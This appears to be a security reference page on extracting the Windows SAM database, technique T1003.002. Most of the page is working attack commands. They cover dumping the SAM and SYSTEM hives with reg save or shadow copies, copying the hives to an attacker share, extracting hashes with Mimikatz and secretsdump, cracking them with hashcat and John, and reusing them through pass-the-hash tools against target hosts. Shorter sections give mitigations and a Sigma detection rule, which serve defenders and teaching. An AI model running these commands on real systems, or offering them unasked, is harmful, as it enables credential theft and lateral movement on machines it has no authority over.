Home / Windows Security / SAM Extraction
High Severity | T1003.002

🗄️ SAM Database Extraction

MITRET1003.002
PlatformWindows
PhaseCredential Access
DifficultyEasy-Medium

🧠 Description

The Security Account Manager (SAM) database stores local user account hashes on Windows systems. Extracting the SAM database allows attackers to obtain NTLM password hashes for all local accounts, which can then be cracked or used for Pass-the-Hash attacks.

Why SAM Extraction Works:
  • Local Storage: SAM file contains all local user hashes
  • Registry Access: System and SAM hives are readable by Administrators
  • Offline Parsing: Hives can be extracted and cracked offline
  • LM Hashes: Often weak, easily cracked

💣 Extraction Methods

1. Registry Save (Requires Admin):

# Save SAM and SYSTEM hives
reg save HKLM\SAM sam.hive /y
reg save HKLM\SYSTEM system.hive /y

# Default location: %WINDIR%\System32\config\
# Or saved to current directory

# Alternative - copy files directly (locked but readable)
copy C:\Windows\System32\config\SAM \\attacker\share\SAM
copy C:\Windows\System32\config\SYSTEM \\attacker\share\SYSTEM

2. Volume Shadow Copy (Alternative Method):

# Create VSS snapshot
vssadmin create shadow /for=C:

# Copy SAM from shadow copy
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM

# Cleanup
vssadmin delete shadows /shadow={shadow_id}

3. Mimikatz (Direct Extraction):

# Token elevation then extract
mimikatz "privilege::debug" "token::elevate" "lsadump::sam" "exit"

# From SAM file directly
mimikatz "lsadump::sam /sam:sam.hive /system:system.hive" "exit"

# With explicit file location
lsadump::sam /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM

# Get cached domain credentials too
lsadump::sam /sam:sam.hive /system:system.hive /bootkey

4. Impacket SecretsDump (Linux):

# Parse saved hives
python3 secretsdump.py -sam sam.hive -system system.hive LOCAL

# Extract with just SYSTEM hive (bootkey)
python3 secretsdump.py -system system.hive LOCAL

# From remote host with credentials
python3 secretsdump.py user:password@target.corp.com

# Using pass-the-hash
python3 secretsdump.py -hashes :ntlmhash domain/user@target.corp.com

🔓 Hash Cracking

Hashcat:

# NTLM hash cracking (mode 1000)
hashcat -m 1000 -a 0 hashes.txt wordlist.txt

# LM hash cracking (mode 3000)
hashcat -m 3000 -a 0 hashes.txt wordlist.txt

# Combined wordlist + rules
hashcat -m 1000 -a 0 hashes.txt wordlist.txt -r rules/best64.rule

# Show status
hashcat -m 1000 -a 0 hashes.txt wordlist.txt --show

John the Ripper:

# NTLM format
john --format=nt2 --wordlist=wordlist.txt hashes.txt

# Raw NTLM (no user:RID:hash format)
john --format=NT --wordlist=wordlist.txt hashes.txt

# Auto-detect format
john hashes.txt --wordlist=wordlist.txt

# Show cracked passwords
john --show hashes.txt

Format for Cracking:

# From Mimikatz output - format is:
# username:RID:lmhash:nthash:::

# Example:
# administrator:500:aad3b435b51404eeaad3b435b51404ee:hash1234567890:::

# Remove lm hash if not needed
# Just nthash needed: hash1234567890:::

🎯 Pass-the-Hash with SAM Hashes

Use Cracked Hashes:

# Mimikatz PtH
mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:target /ntlm:hash" "exit"

# CrackMapExec
crackmapexec smb target.corp.com -u administrator -H nthash -x "whoami"

# Pass the hash with PassTheHash tool
python3 wmiexec.py -hashes :nthash domain/user@target.corp.com

# Using evil-winrm
evil-winrm -i target.corp.com -u administrator -H nthash

Use LM Hash if NTLM Weak:

# If LM hash present, might be crackable
# Some systems still store LM for compatibility

# Crack LM with hashcat (mode 3000)
hashcat -m 3000 lm_hashes.txt wordlist.txt

🛡️ Mitigation

✅ Primary Controls:
  • Disable LM Hashes: No LM storage in SAM
  • Strong Passwords: 14+ characters, complex, unique
  • Local Admin Protection: Microsoft LAPS or similar
  • Restrict Registry: Limit who can save hives
  • BitLocker: Encrypt system drive
  • Audit Local Accounts: Monitor for suspicious admin accounts

Disable LM Hash Storage:

# Via Security Policy
# Computer Configuration > Policies > Security Options >
# Network security: Do not store LAN Manager hash value on next password change

# Enable via registry
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v NoLMHash /t REG_DWORD /d 1 /f

# Requires password change to take effect

🔍 Detection

Event Log Monitoring:

# Event ID 4657 - Audit registry value creation (SAM access)
# Event ID 4660 - Audit object deletion
# Event ID 4673 - Sensitive privilege use

# Monitor for:
# - reg.exe saving SAM/SYSTEM hives
# - Process accessing HKLM\SAM
# - Command: reg save HKLM\SAM

# Use Sysmon
# Track registry operations on SAM key

Sysmon Configuration:

# Monitor SAM registry access

  HKLM\System\CurrentControlSet\Control\Lsa
  HKLM\SAM


# Alert on SAM backup operations

  reg save HKLM\SAM

Sigma Rules:

title: SAM Registry Backup
id: sam-registry-save
detection:
  selection:
    EventID: 1
    CommandLine|contains:
      - 'reg save HKLM\SAM'
      - 'reg save HKLM\SYSTEM'
      - '\config\SAM'
      - '\config\SYSTEM'
  condition: selection
level: high

🛠️ Tools

  • Mimikatz: Direct SAM extraction and parsing
  • Impacket (secretsdump): Offline SAM parsing from hives
  • hashcat: GPU-accelerated hash cracking
  • John the Ripper: Open-source hash cracking
  • Creddump7: Python-based SAM extraction

📚 References

Back to Windows Security